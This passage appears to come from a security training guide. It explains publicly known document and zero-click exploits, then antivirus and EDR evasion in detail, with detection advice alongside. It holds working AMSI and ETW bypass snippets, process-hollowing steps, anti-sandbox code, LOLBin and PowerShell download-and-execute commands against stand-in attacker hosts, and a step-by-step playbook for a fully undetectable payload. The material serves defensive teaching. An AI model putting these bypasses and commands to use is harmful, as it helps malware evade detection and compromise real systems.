pdf-parser.py and peepdf extract and decode JavaScript from PDF streams, revealing heap spray patterns and suspicious API calls like Collab.collectEmailInfo.%u0c0c%u0c0c NOP sled signatures, /OpenAction + /JavaScript combos, and known shellcode byte sequences.
The x86 (32-bit) examples above demonstrate core concepts. Modern targets are x86-64, with significant differences and additional mitigations:
Modern exploit chains typically combine an info leak (defeats ASLR by revealing a DLL base address) + a ROP chain (defeats DEP by reusing existing code) + a sandbox escape (breaks out of application isolation). Each layer adds cost and complexity — this is why a working zero-click iOS chain costs $2.8M+.
These are publicly documented vulnerabilities that have been weaponized in real-world attacks against governments, corporations, and individuals. Every single one has been patched — studying them reveals the patterns attackers reuse, the code paths they target, and the detection opportunities defenders can exploit. Each CVE below includes: what the vulnerability was, how attackers exploited it, the technical mechanism, and what defenders should look for.
| CVE | Name | Type | CVSS | Severity | Year |
|---|---|---|---|---|---|
| CVE-2017-0199 | HTA Handler | Doc / OLE | 9.8 | CRITICAL | 2017 |
| CVE-2017-11882 | Equation Editor | Doc / Memory Corruption | 7.8 | CRITICAL | 2017 |
| CVE-2019-3568 | WhatsApp VoIP | Zero-Click / Buffer Overflow | 9.8 | CRITICAL | 2019 |
| CVE-2021-1732 | Win32k Priv Esc | Kernel / LPE | 7.8 | HIGH | 2021 |
| CVE-2021-30860 | FORCEDENTRY | Zero-Click / Image Parser | 7.8 | CRITICAL | 2021 |
| CVE-2021-40444 | MSHTML RCE | Doc / ActiveX | 7.8 | CRITICAL | 2021 |
| CVE-2022-30190 | Follina | Doc / MSDT Protocol | 7.8 | CRITICAL | 2022 |
| CVE-2023-36884 | Office HTML RCE | Doc / HTML Smuggling | 7.5 | CRITICAL | 2023 |
| CVE-2023-41064 | BLASTPASS | Zero-Click / Image | 7.8 | CRITICAL | 2023 |
Each CVE below is broken down into its full technical detail — the vulnerability, how it was exploited in the wild, what the attacker's exploit looked like, and what defenders should monitor for.
The Vulnerability: When a Word document contained an OLE2 embedded object linking to an external URL, Word would fetch that URL and — if the server returned content with a Content-Type: application/hta header — Word would pass the content directly to mshta.exe (the HTML Application host) for execution. This happened before any security prompt was shown to the user.
How Attackers Exploited It: The attacker crafted a .docx file with an embedded OLE object whose relationship target pointed to http://attacker.com/payload.hta. The document.xml.rels file contained: Target="http://evil.com/payload.hta" TargetMode="External". When the victim opened the document, Word fetched the URL silently. The attacker's server returned an HTA file containing VBScript that ran Shell("powershell -enc [base64_payload]"). This executed arbitrary PowerShell commands with the user's privileges.
Detection: Monitor for mshta.exe spawned as a child process of WINWORD.EXE. Look for outbound HTTP requests from Office processes. YARA rule: match on OLE2Link + external URL in relationship files.
The Vulnerability: Microsoft's Equation Editor (EQNEDT32.EXE) was a 17-year-old component compiled in November 2000 without ASLR, DEP, or stack canaries. It processed OLE Equation objects embedded in Office documents. A font name field in the MTEF (MathType Equation Format) data had a fixed 48-byte buffer with no bounds checking. Writing more than 48 bytes into this field overflowed the stack and overwrote the return address.
How Attackers Exploited It: The exploit embedded a crafted Equation object inside a .docx file. The font name field was filled with 44 bytes of padding + the address 0x00402114 (a fixed address inside EQNEDT32.EXE pointing to a WinExec() gadget, reliable because no ASLR). After the return address, the attacker placed a command string like cmd /c powershell -nop -w hidden -enc [base64]. When Equation Editor processed the font name, it overflowed → returned into WinExec → executed the command. The entire exploit payload was 92 bytes.
Why It Was So Dangerous: No ASLR meant the return address never changed. No DEP meant stack data could be executed. No canaries meant the overflow was never detected. The exploit worked reliably across every Windows version and every Office version that shipped EQNEDT32.EXE — for 17 years of installs.
Detection: Monitor for EQNEDT32.EXE spawning child processes (it should never do this). YARA rule: match on Equation OLE CLSID {0002CE02-0000-0000-C000-000000000046} with font name length > 48 bytes.
The Vulnerability: WhatsApp's VoIP (Voice over IP) implementation used the SRTP (Secure Real-time Transport Protocol) stack to process incoming call setup packets. A buffer overflow existed in the SRTCP (SRTP Control Protocol) handler that parsed incoming packet data. The parser read a length field from the packet and used it to copy data into a fixed-size buffer — without validating that the length was within bounds.
How Attackers Exploited It: The NSO Group's Pegasus spyware used this vulnerability. The attack was completely zero-click: the attacker sent a specially crafted SRTCP packet by initiating a call to the victim's phone number. The victim's phone didn't even need to answer — WhatsApp processed the call setup packet automatically. The overflow in the SRTCP handler hijacked control flow and loaded the Pegasus payload, which gained full access to the device (messages, camera, microphone, GPS, passwords). The call log entry was then deleted so the victim saw nothing.
Detection: Correlate incoming WhatsApp calls with no call log entry. Monitor for unexpected process memory modifications after WhatsApp network activity. WhatsApp published hashes of the exploit packets for forensic analysis.
The Vulnerability: A type confusion bug in the Windows kernel's win32kfull!xxxClientAllocWindowClassExtraBytes function. When a window was created with extra bytes (cbWndExtra), the kernel allocated memory and returned a pointer. An attacker could manipulate the window creation process to cause the kernel to use a user-mode callback that returned a different allocation — creating a type confusion where the kernel treated user-controlled data as a kernel object pointer.
How Attackers Exploited It: This was a privilege escalation exploit — used after initial access (e.g., via a document exploit) to go from user-level to SYSTEM. The attacker created a window with specific cbWndExtra value, hooked the user-mode callback xxxClientAllocWindowClassExtraBytes, returned a crafted buffer from the callback, and the kernel wrote a kernel pointer into attacker-controlled memory. This gave arbitrary kernel read/write, used to steal the SYSTEM process token and assign it to the attacker's process.
The Chain: Often seen as Stage 2 in attack chains — a document exploit gains initial code execution (Stage 1), then CVE-2021-1732 escalates to SYSTEM (Stage 2), then the attacker dumps credentials with Mimikatz (Stage 3).
Detection: Monitor for user-mode processes making unusual NtUserConsoleControl syscalls. Kernel exploit artifacts include processes with SYSTEM token that were launched from browser or Office contexts.
The Vulnerability: A integer overflow in Apple's CoreGraphics framework, specifically in the JBIG2 image decoder used to render PDF content in iMessage. JBIG2 is a lossless compression standard for bi-level (black and white) images. Apple's implementation had a flaw where a crafted JBIG2 stream with specific segment parameters could cause an integer overflow in a size calculation, leading to a heap buffer overflow.
How Attackers Exploited It: NSO Group sent an iMessage to the target containing a PDF file disguised as a .gif (iMessage rendered it automatically, zero-click). The PDF contained a JBIG2 stream with over 70,000 segment commands that, taken together, defined a virtual computer architecture. The JBIG2 segments were used as logical operations (AND, OR, XOR, NOT) on memory regions, implementing a full virtual machine with registers, an ALU, and conditional branching — all within the JBIG2 decompression engine. This VM then bootstrapped a more capable exploit that escaped the iMessage sandbox to install Pegasus.
Why This Was Unprecedented: Google Project Zero called it "one of the most technically sophisticated exploits we've ever seen." The attacker built a Turing-complete computer inside an image decoder — no JavaScript, no JIT, no scripting engine. Pure data manipulation through a compression standard's legitimate operations.
Detection: Look for PDF files received via iMessage with unusually large JBIG2 streams (>10KB is suspicious). Apple added BlastDoor sandbox in iOS 14 to isolate iMessage parsing, but FORCEDENTRY bypassed it. iOS 15 hardened JBIG2 parsing significantly.
The Vulnerability: Microsoft's MSHTML (Trident) engine — the same engine behind Internet Explorer — could be invoked by Office documents to render HTML content. A flaw allowed a specially crafted ActiveX control to be downloaded and instantiated through MSHTML when processing Office documents with embedded HTML content. The ActiveX control could execute arbitrary code because Office did not properly restrict which controls could be loaded.
How Attackers Exploited It: The attacker sent a .docx file that contained a document.xml.rels relationship pointing to an external HTML page: http://attacker.com/exploit.html. When Word loaded this page through MSHTML, the HTML contained an <object> tag that downloaded a .CAB file from the attacker's server. Inside the CAB was a malicious .DLL renamed with a .INF extension. MSHTML extracted the CAB, loaded the DLL via a crafted directory traversal path in the CAB extraction, and the DLL began executing as a child of Word — downloading and running a Cobalt Strike beacon.
Detection: Monitor for WINWORD.EXE making HTTP requests to external servers. Look for .CAB file extraction in temporary directories. YARA rule: match on mhtml: protocol handler references in document.xml.rels.
The Vulnerability: The ms-msdt: protocol handler (Microsoft Support Diagnostic Tool) accepted command-line arguments via URL. When an Office document loaded an external HTML page that used the ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=..." URL scheme, MSDT would launch and process the parameters. The IT_BrowseForFile parameter was expanded by sdiagnhost.exe using PowerShell's Invoke-Expression — meaning any value in this parameter became executable PowerShell code.
How Attackers Exploited It: The attack chain was: (1) .docx with external relationship → (2) Word fetches HTML from attacker server → (3) HTML contains: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(IEX($(Invoke-RestMethod http://c2/payload.ps1))\"" → (4) MSDT launches → (5) sdiagnhost.exe runs PowerShell → (6) attacker has code execution. Critically, this worked even in Protected View for .RTF files — the preview pane in Windows Explorer triggered it without even opening the file.
Detection: Monitor for msdt.exe or sdiagnhost.exe spawned as children of Office processes. Delete the ms-msdt registry key to disable the protocol handler entirely: reg delete HKCR\ms-msdt /f.
The Vulnerability: A complex chain of vulnerabilities in how Microsoft Office processed HTML content through the MSHTML engine. Multiple security checks could be bypassed using special URL constructions and file path handling, allowing remote code execution when a user opened a specially crafted Office document — even with macros disabled.
How Attackers Exploited It: The Russian threat group Storm-0978 (RomCom) used this in targeted attacks against NATO summit attendees and Ukrainian government organizations. The attack used a crafted .docx file that triggered a chain of HTML loads, each bypassing a different security boundary. The document loaded external HTML through MSHTML, which loaded additional content via search-ms: protocol handler, eventually achieving code execution through a Mark-of-the-Web bypass combined with a SmartScreen bypass. The final payload was the RomCom backdoor — a full RAT (Remote Access Trojan) with keylogging, screen capture, and data exfiltration capabilities.
Detection: Monitor Office processes for chains of child process creation. Look for search-ms: protocol handler invocations from document contexts. Block outbound HTTP from Office processes with firewall rules. Microsoft released emergency mitigations before the patch was ready.
The Vulnerability: A buffer overflow in Apple's ImageIO framework, specifically in the WebP image decoder (libwebp). The vulnerability existed in the Huffman coding table construction used during WebP lossless decompression. A crafted WebP image with malformed Huffman codes caused a heap buffer overflow when the decoder attempted to build the lookup table.
How Attackers Exploited It: NSO Group combined this with a second vulnerability (CVE-2023-41061, a PassKit/Wallet validation bypass) in a two-step zero-click chain. Step 1: An iMessage was sent containing a PassKit attachment (.pkpass file — normally used for Apple Wallet passes). The PassKit attachment contained a crafted WebP image that triggered CVE-2023-41064 heap overflow during automatic thumbnail generation. Step 2: The heap overflow exploited the Wallet validation bypass (CVE-2023-41061) to escape the BlastDoor sandbox that Apple had specifically built to prevent FORCEDENTRY-style attacks. The combined chain installed Pegasus spyware with full device access.
Why It Matters: This showed that even after Apple built BlastDoor specifically to stop zero-click iMessage exploits, NSO Group found a way around it within 2 years — by chaining a different parser (WebP in ImageIO) with a different sandbox escape (PassKit instead of JBIG2). The WebP vulnerability (CVE-2023-41064) also affected Chrome, Firefox, and virtually every application that used libwebp — making it one of the most impactful image parser bugs in history.
Detection: Update to iOS 16.6.1+. Monitor for unusually large .pkpass files received via iMessage. Apple's Lockdown Mode blocks PassKit previews in iMessage, which would have prevented this chain.
Across all 9 CVEs above, notice the recurring patterns: (1) Parser vulnerabilities — every exploit targets code that parses complex data formats (OLE, JBIG2, WebP, SRTCP, PDF). (2) Privilege boundaries — attackers chain user-mode exploits with kernel exploits (CVE-2021-1732) or sandbox escapes (BLASTPASS). (3) Legacy components — EQNEDT32.EXE (17 years old), MSHTML/Trident (deprecated but still loadable), MSDT (rarely used diagnostic tool). (4) Protocol handlers — ms-msdt:, search-ms:, mhtml: — these URL schemes bridge security boundaries. Disabling unnecessary protocol handlers and removing legacy components dramatically reduces attack surface.
You've seen how exploits work — the buffer overflows, the shellcode, the PDF weaponization. But here's the reality: none of that matters if antivirus catches it on delivery. This is where FUD — Fully Undetectable — comes in. Every serious attacker spends more time making their payload invisible than building the exploit itself. This section breaks down every layer of the evasion stack, the exact tools and techniques used, and how defenders catch each one.
This section explains evasion techniques so defenders and security analysts understand what they're up against. Every technique described here is documented in public threat intelligence reports, academic papers, and vendor advisories. Understanding evasion is essential for writing detection rules, tuning EDR policies, and conducting threat hunting. The goal: if you know how they hide, you know where to look.
In underground markets, FUD = Fully Undetectable — meaning a payload that returns 0 detections across all antivirus engines when scanned. The term comes from a simple test: upload your malware to a multi-scanner, check the results.
FUD lifespan: A fresh FUD payload typically lasts 24-72 hours before cloud-based AV (telemetry, behavioral ML, community submissions) picks it up. APT groups maintain dedicated teams that re-FUD payloads continuously. The underground economy charges $50-$150 per "re-crypt" to restore FUD status.
A file goes through 5 stages of analysis before it detonates on a target. Evasion means beating ALL of them:
① Static Signature: YARA-like byte pattern matching against known malware databases. Speed: microseconds. Bypass: change the bytes (encryption, packing, polymorphism).
② Heuristic Analysis: Rules that flag suspicious characteristics — high entropy, no imports, suspicious section names, packer signatures. Bypass: entropy reduction, import reconstruction, legitimate-looking PE structure.
③ Behavioral/Emulation: AV emulates the first ~1000 instructions in a mini sandbox to see what the code does. Bypass: environmental checks, delayed execution, anti-emulation tricks.
④ Cloud/ML Analysis: File hash and metadata sent to cloud for machine learning classification. Bypass: unique hash per target, metadata spoofing, signed executables.
⑤ Full Sandbox Detonation: File executed in an instrumented VM for 2-5 minutes. Monitors: API calls, network traffic, registry, file system. Bypass: VM detection, timing attacks, user interaction requirements.
The first and most fundamental evasion layer. The goal: make the file look like something it isn't so signature scanners can't pattern-match it.
What they do: Compress the entire executable into a compressed blob, then prepend a small "stub" that decompresses it into memory at runtime. The original code never exists on disk in readable form.
How it works:
Original EXE (100 KB)
├── .text → executable code (detectable)
├── .data → strings like "WinExec" (detectable)
└── .rsrc → resources
After UPX packing (40 KB):
├── UPX0 → empty (will be filled at runtime)
├── UPX1 → compressed blob (looks like random data)
└── stub → 2KB decompressor
└── At runtime: decompress UPX1 → UPX0 → jump to OEP
Common packers:
Detection: YARA rules for packer stubs (UPX! magic bytes), section name patterns (UPX0/UPX1), abnormal section entropy (>7.0), tiny import table (only LoadLibrary + GetProcAddress).
What they do: Encrypt the malware payload with AES/RC4/XOR, bundle it with a "stub" (decryptor) that decrypts and executes it in memory. The encrypted payload has zero recognizable signatures.
Architecture:
Crypter Output: ┌─────────────────────────────┐ │ STUB (clean decryptor) │ ← Looks legitimate │ ├── AES key (embedded) │ │ ├── Decrypt routine │ │ └── Execution method: │ │ ├── RunPE (hollowing) │ │ ├── Reflective inject │ │ └── Shellcode execute │ ├─────────────────────────────┤ │ ENCRYPTED PAYLOAD │ ← AES-256 encrypted │ (rat.exe, stealer.exe) │ No signatures visible │ Entropy: ~7.99/8.00 │ └─────────────────────────────┘
Stub types:
Assembly.Load() for in-memory .NET payload execution. Easy to build, but .NET metadata gives defenders more to analyze.Detection: High entropy sections, small import table, suspicious API sequences (VirtualAlloc → memcpy → VirtualProtect(PAGE_EXECUTE) → CreateThread), decryption loop patterns in code.
Underground forums and Telegram channels sell FUD services as subscriptions. Typical pricing:
Crypter subscription: $30-150/month — includes daily stub updates to maintain FUD status
Single crypt: $15-50 — one-time encryption, FUD lasts 1-3 days
Private/custom crypter: $500-5,000 — hand-coded, unique stub, shared with <5 customers
FUD checking services: Private scanners (like antiscan.me) that test against 30+ AV engines without submitting samples to vendors (unlike VirusTotal which shares with all vendors)
Packers and crypters change how the payload looks on disk. Polymorphic and metamorphic engines go further — they change the code itself while preserving functionality.
Each time the malware copies itself or is generated, the decryption routine changes while the encrypted payload stays the same. The decryptor uses different registers, different instruction orders, and inserts junk code — so no two copies share the same byte signature.
// Generation 1: MOV ECX, 0x1A4 ; payload length MOV ESI, offset payload ; source XOR BYTE [ESI], 0x5A ; XOR key INC ESI LOOP decrypt // Generation 2 (same logic, different bytes): MOV EDX, 0x1A4 ; different register LEA EDI, [payload] ; different addressing SUB EDI, 1 next: INC EDI XOR BYTE [EDI], 0x5A DEC EDX JNZ next ; different loop construct
Detection: Emulation — let the AV run the decryptor, then scan the decrypted payload. Cloud ML on behavioral patterns rather than bytes.
The entire malware rewrites itself — not just the decryptor but the actual functional code. Techniques include: NOP insertion, register reassignment, instruction reordering, equivalent instruction substitution, code transposition, and junk code insertion.
Substitution examples: XOR EAX, EAX ↔ SUB EAX, EAX ↔ MOV EAX, 0 ADD EAX, 5 ↔ SUB EAX, -5 ↔ LEA EAX, [EAX+5] CMP EAX, 0; JE ↔ TEST EAX, EAX; JZ ↔ OR EAX, EAX; JZ PUSH EAX; POP EBX ↔ MOV EBX, EAX NOP ↔ XCHG EAX, EAX ↔ LEA EAX, [EAX] Code transposition: Original: [Block A] → [Block B] → [Block C] Rewritten: [Block C] → JMP B_addr [Block A] → JMP C_addr [Block B] → JMP end
Detection: Control flow graph analysis, behavioral signatures, code normalization (reduce equivalent instructions to canonical form before matching).
The most effective evasion: never write the real payload to disk at all. Instead, inject it directly into the memory of a legitimate process. To the OS and security tools, it looks like svchost.exe or explorer.exe is running — but the attacker's code lives inside it.
The most common technique used by crypters. Creates a legitimate process in a suspended state, hollows out its memory, writes the malicious PE, then resumes execution.
Step-by-step:
1. CreateProcess("svchost.exe", CREATE_SUSPENDED)
→ Real svchost starts but frozen before first instruction
2. NtUnmapViewOfSection(hProcess, imageBase)
→ Guts removed — original svchost code unmapped
3. VirtualAllocEx(hProcess, imageBase, malwareSize, MEM_COMMIT)
→ Fresh memory allocated at same address
4. WriteProcessMemory(hProcess, imageBase, malwarePE)
→ Malware PE written into svchost's memory space
5. SetThreadContext(hThread, newEntryPoint)
→ EIP/RIP pointed to malware's entry point
6. ResumeThread(hThread)
→ "svchost.exe" is now running your malware
→ Task Manager shows: svchost.exe (legitimate name+path)
→ Parent process: services.exe (looks normal)
MITRE: T1055.012 Process Hollowing
CreateRemoteThread(LoadLibrary, "malware.dll"). Drops DLL to disk, injects into target process. Oldest method, well-detected. T1055.001QueueUserAPC(shellcode, hThread). Queues malicious code to run next time the target thread enters an alertable wait state. Stealthier than CreateRemoteThread. T1055.004amsi.dll) already loaded in process memory. Code runs from a backed (legitimate) memory region — avoids "unbacked executable memory" detections.Detection: Monitor for cross-process memory operations: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread from a process that shouldn't be doing this. EDR hooks these APIs at the ntdll level.
Even with encrypted payloads and process injection, modern EDR (Endpoint Detection and Response) instruments the OS at a deep level. Advanced attackers must specifically defeat these monitoring systems.
AMSI is Microsoft's content scanning pipeline. When PowerShell, .NET, JavaScript, VBScript, or Office VBA executes content, it passes through AMSI before running. AMSI sends the content (even if obfuscated) to the registered AV provider for scanning.
AMSI Pipeline: PowerShell script → amsi.dll!AmsiScanBuffer() → AV Engine → ALLOW / BLOCK ↑ Attackers patch HERE Bypass Method 1 — Memory Patching (most common): 1. GetProcAddress(amsi.dll, "AmsiScanBuffer") 2. VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE) 3. Write: MOV EAX, 0x80070057; RET (= E_INVALIDARG → "scan passed") → Every future AmsiScanBuffer() call returns "clean" Bypass Method 2 — Forcing amsiInitFailed: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) → AMSI thinks initialization failed → all scans skipped Bypass Method 3 — Unhooking amsi.dll: Map fresh copy of amsi.dll from disk → overwrite .text section → All patches/hooks are removed → clean DLL, no scanning
Defense: Defender for Endpoint monitors AMSI integrity. .NET ETW events log AMSI bypass attempts. Behavioral rule: any process calling VirtualProtect on amsi.dll regions is suspicious.
EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical API functions in ntdll.dll. When your malware calls NtWriteVirtualMemory, the call first goes through the EDR's hook, which logs it and decides whether to allow or block.
How EDR hooks work: Normal: NtWriteVirtualMemory → syscall → kernel Hooked: NtWriteVirtualMemory → JMP edr_monitor.dll → log → syscall → kernel Unhooking Method 1 — Fresh ntdll mapping: 1. MapViewOfFile("C:\Windows\System32\ntdll.dll") // read clean copy 2. Find .text section in both loaded and clean copies 3. VirtualProtect(loaded_ntdll.text, RWX) 4. memcpy(loaded_ntdll.text, clean_ntdll.text) // overwrite hooks → All EDR hooks REMOVED — calls go directly to kernel Unhooking Method 2 — Direct syscalls (Syswhispers / Hell's Gate): Instead of calling ntdll!NtWriteVirtualMemory (which is hooked), the malware contains its OWN syscall stubs: MOV R10, RCX MOV EAX, 0x3A ; syscall number for NtWriteVirtualMemory SYSCALL ; jump directly to kernel — EDR never sees it Tools that implement this: • SysWhispers — generates syscall stubs at compile time • Hell's Gate — resolves syscall numbers dynamically at runtime • Halo's Gate — handles partially-hooked ntdll scenarios • RecycledGate / FreshyCalls — variant approaches
Defense: Kernel-level ETW (Event Tracing for Windows) still sees syscalls. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) operate at a level malware can't unhook from userland. Modern EDRs combine userland hooks + kernel telemetry for this reason.
ETW (Event Tracing for Windows) is the OS-level logging framework. .NET events, PowerShell script blocks, process creation, network connections — all flow through ETW providers to security tools. Patching ETW makes the process invisible to monitoring.
ETW Patch (disable logging for current process): 1. GetProcAddress(ntdll.dll, "EtwEventWrite") 2. Write: RET (0xC3) at the entry point → EtwEventWrite immediately returns → no events logged → PowerShell ScriptBlock logging: GONE → .NET assembly load events: GONE → Process telemetry from this process: GONE What disappears: • Microsoft-Windows-PowerShell/Operational log entries • .NET CLR loading events (Assembly.Load visible normally) • WMI activity events • Network connection attribution to this process
Defense: Monitor for ETW provider registration changes. Kernel-level drivers (minifilters) can detect ETW tampering. Integrity checks on ntdll.dll function prologues (detect single-byte patches).
Security sandboxes (AV emulators, corporate detonation chambers, VirusTotal) run suspicious files in monitored environments. Sophisticated malware fingerprints the environment and refuses to execute if it detects analysis.
── Environment Fingerprinting ── // CPU check — sandboxes often have ≤2 cores if (GetSystemInfo().dwNumberOfProcessors < 2) ExitProcess(0); // RAM check — sandboxes often have ≤4GB MEMORYSTATUSEX mem; GlobalMemoryStatusEx(&mem); if (mem.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) ExitProcess(0); // Uptime check — sandbox VMs are freshly booted if (GetTickCount64() < 600000) Sleep(600000); // wait 10 min // Process count — real systems have 50+ processes DWORD procs[1024]; EnumProcesses(procs, sizeof(procs), &needed); if (needed/sizeof(DWORD) < 40) ExitProcess(0); // Mouse movement — sandboxes don't move the mouse POINT p1, p2; GetCursorPos(&p1); Sleep(5000); GetCursorPos(&p2); if (p1.x == p2.x && p1.y == p2.y) ExitProcess(0); // Username/hostname check — avoid "sandbox", "virus", "malware" char name[256]; DWORD sz = 256; GetComputerNameA(name, &sz); if (strstr(name, "sandbox") || strstr(name, "virus")) ExitProcess(0); ── Hypervisor / VM Detection ── // CPUID hypervisor bit (bit 31 of ECX from leaf 1) __cpuid(regs, 1); if (regs[2] & (1 << 31)) ExitProcess(0); // running in VM // VMware I/O port backdoor MOV EAX, 'VMXh'; MOV ECX, 0Ah; MOV EDX, 'VX'; IN EAX, DX // If no exception → running in VMware // Registry keys — VM guest tools leave traces RegOpenKey(HKLM, "SOFTWARE\\VMware, Inc.\\VMware Tools", &key); RegOpenKey(HKLM, "SOFTWARE\\Oracle\\VirtualBox Guest Additions", &key); ── Anti-Debug ── // Direct API check if (IsDebuggerPresent()) ExitProcess(0); // PEB flag (manual check — bypasses API hooks) BOOL dbg = *(PBYTE)(__readgsqword(0x60) + 2); // PEB.BeingDebugged // Timing-based — debug stepping is slow LARGE_INTEGER t1, t2; QueryPerformanceCounter(&t1); // ... some code ... QueryPerformanceCounter(&t2); if ((t2.QuadPart - t1.QuadPart) > 10000) ExitProcess(0);
The ultimate evasion: never drop a file at all. Use tools already on the victim's machine (LOLBins — Living Off the Land Binaries) and execute entirely from memory, scripts, or built-in OS features.
Example 1 — PowerShell Download Cradle (nothing written to disk): powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://evil/payload.ps1')" → Script downloads into memory → executes → loads .NET assembly → injects into explorer.exe → Zero files on disk. Zero artifacts in Downloads. Only evidence: PowerShell logs (if enabled). Example 2 — Macro → WMI Persistence (survives reboot without files): Sub AutoOpen() Set objWMI = GetObject("winmgmts:\\.\root\subscription") ' Create WMI event subscription → runs PowerShell on every boot ' Payload stored in WMI repository (C:\Windows\System32\wbem\Repository) ' No visible file. No scheduled task. No registry run key. End Sub Example 3 — Registry-resident payload: reg add HKCU\Software\Classes\Payload /v data /t REG_BINARY /d <shellcode_hex> → Shellcode stored in registry value → Loader reads registry → VirtualAlloc → memcpy → CreateThread → Payload lives in the registry hive, never as a file
These are signed Microsoft binaries already on every Windows machine. They have legitimate functions — but can be abused to download, decode, execute, or proxy malicious payloads. AV can't block them because they're part of Windows.
| LOLBin | Legitimate Purpose | Abuse Technique | MITRE |
|---|---|---|---|
| certutil.exe | Certificate management | certutil -urlcache -split -f http://evil/payload.exe — downloads files |
T1105 |
| mshta.exe | HTML Application host | mshta http://evil/payload.hta — executes arbitrary VBScript/JScript |
T1218.005 |
| rundll32.exe | Execute DLL functions | rundll32 javascript:"\..\mshtml,RunHTMLApplication"; + WSH script |
T1218.011 |
| regsvr32.exe | Register COM objects | regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll — Squiblydoo attack |
T1218.010 |
| msbuild.exe | .NET Build tool | Build a .csproj with inline C# task → compile + execute arbitrary code | T1127.001 |
| bitsadmin.exe | Background file transfer | bitsadmin /transfer job /download http://evil/payload.exe |
T1197 |
| wmic.exe | WMI management | wmic process call create "powershell -enc <base64>" |
T1047 |
| cmstp.exe | Connection Manager installer | Provide malicious .inf file → executes arbitrary commands, bypasses UAC | T1218.003 |
Detection: Sigma rules flagging unusual parent-child process chains (e.g., WINWORD.EXE → mshta.exe). Behavioral baselines — certutil making HTTP requests, msbuild executing outside of developer systems. LOLBAS project (lolbas-project.github.io) catalogs all known techniques.
The final layers that separate amateur RATs from nation-state implants.
C2 implants spend 99% of their time sleeping between check-ins. During sleep, the shellcode sits in readable memory — perfect for memory scanners. Sleep obfuscation encrypts the beacon's memory during sleep and decrypts only when it wakes up to check in.
Ekko Sleep Obfuscation:
1. Create timer queue (ROP chain using NtContinue)
2. Set timer callback: VirtualProtect(beacon, RW)
3. Set timer callback: SystemFunction032(beacon, key) // RC4 encrypt
4. Set timer callback: Sleep(60000) // 60s sleep
5. Set timer callback: SystemFunction032(beacon, key) // RC4 decrypt
6. Set timer callback: VirtualProtect(beacon, RX)
7. Queue all timers → beacon memory ENCRYPTED during sleep
→ Memory scan during sleep sees: encrypted garbage
→ Memory scan when awake: 0.5s window to catch it
Detection: Detect RWX → RW memory transitions. Scan for timer queue chains with suspicious callbacks. Thread stack analysis for NtContinue ROP gadgets.
Windows SmartScreen and AV reputation engines trust signed binaries. Attackers exploit this trust through:
Detection: Certificate reputation checks. Flag newly issued certs. Check for known stolen cert serial numbers (Stuxnet: Realtek 01 00 00 00 00 01 1E 3B 4E).
Encrypted/packed payloads have high entropy (~7.9/8.0). Security tools flag this. Attackers reduce entropy to look like normal executables (~5.0-6.5):
Detection: Per-section entropy analysis (not whole-file). Detect large resource sections with English text + code sections with high entropy = suspicious combination.
After landing on a system, attackers cover their tracks:
SetFileTime() or NtSetInformationFile). A dropped malware.exe gets timestamps from 2019 to blend with surrounding files. T1070.006wevtutil cl Security or Clear-EventLog. Nukes the Security event log. Ironic: clearing the log generates Event ID 1102 (log was cleared). T1070.001Detection: $MFT (Master File Table) preserves original timestamps even when MACE timestamps are modified. Centralized SIEM — logs forwarded in real-time can't be retroactively deleted from the SIEM. Event ID 1102 alerts. JA3 fingerprinting of C2 traffic.
Here's how a real-world attacker combines every layer into one delivery:
STEP 1 — Build the payload Tool: Custom RAT / Cobalt Strike / Sliver C2 framework Output: beacon.exe (detected by 58/72 AV engines — completely burned) STEP 2 — Encrypt with crypter (static evasion) Tool: Private crypter (native C stub + AES-256) Process: beacon.exe → AES encrypt → embed in stub → output.exe Result: 12/72 detections (heuristics still flag it — stub pattern known) STEP 3 — Add process injection (runtime evasion) Stub modified: decrypt in memory → process hollow into RuntimeBroker.exe Result: 3/72 detections (behavioral heuristics on injection pattern) STEP 4 — Anti-sandbox + anti-debug Add: CPU cores check, RAM check, 10-min sleep delay, mouse movement check Result: 1/72 detections (one ML engine still suspicious of PE structure) STEP 5 — Entropy reduction + signing Pad resource section with legitimate strings, sign with purchased EV cert Result: 0/72 detections — FUD achieved STEP 6 — Embed in delivery vehicle Option A: Pack into ISO/IMG → attach to spearphishing email (bypasses MotW) Option B: Embed in PDF via /Launch or /OpenAction JavaScript Option C: Host on compromised website → drive-by download Option D: Side-load via legitimate signed application (DLL hijacking) STEP 7 — Post-exploitation stealth - AMSI patch (PowerShell now unmonitored) - ETW patch (telemetry disabled for this process) - Sleep encryption (Ekko — encrypted during 60s sleep cycles) - Timestomp dropped files to match explorer.exe dates - C2 over DNS-over-HTTPS to Cloudflare (looks like normal DNS traffic) TOTAL EVASION LAYERS: 7 stacked techniques COMBINED COST: ~$500-2000 (crypter + cert + C2 infra) FUD LIFESPAN: 1-3 days before cloud telemetry catches it
Every evasion technique above has detection opportunities. The key insight: attackers can't evade every layer simultaneously.
Behavioral detection catches what signatures miss — even a FUD binary must eventually call VirtualAlloc → WriteProcessMemory → CreateRemoteThread. EDR sees the behavior, not the bytes.
Network detection catches what endpoint evasion misses — the C2 beacon must communicate. Even DNS-over-HTTPS C2 creates detectable traffic patterns (periodic intervals, fixed packet sizes).
Kernel telemetry catches what userland unhooking misses — kernel callbacks and ETW at the kernel level still report process creation, thread injection, and memory allocation even when ntdll hooks are removed.
Memory forensics catches what sleep obfuscation misses — periodic memory scans have a statistical chance of catching the beacon during its brief awake window. Detect RWX → RW transitions as suspicious.
This is an arms race — and defenders have the advantage of breadth. An attacker must defeat every defense. A defender only needs to catch the attacker once.
Chapter 09 covered classic evasion — packers, crypters, process injection. But modern security infrastructure has evolved far beyond signature-based AV. Today's defenders deploy AI/ML models, cloud-detonation sandboxes, Extended Detection & Response (XDR), hardware-enforced security, and Zero Trust architectures. This chapter shows how the attacker side has evolved to match — and how each new defense creates a new bypass technique in an endless arms race.
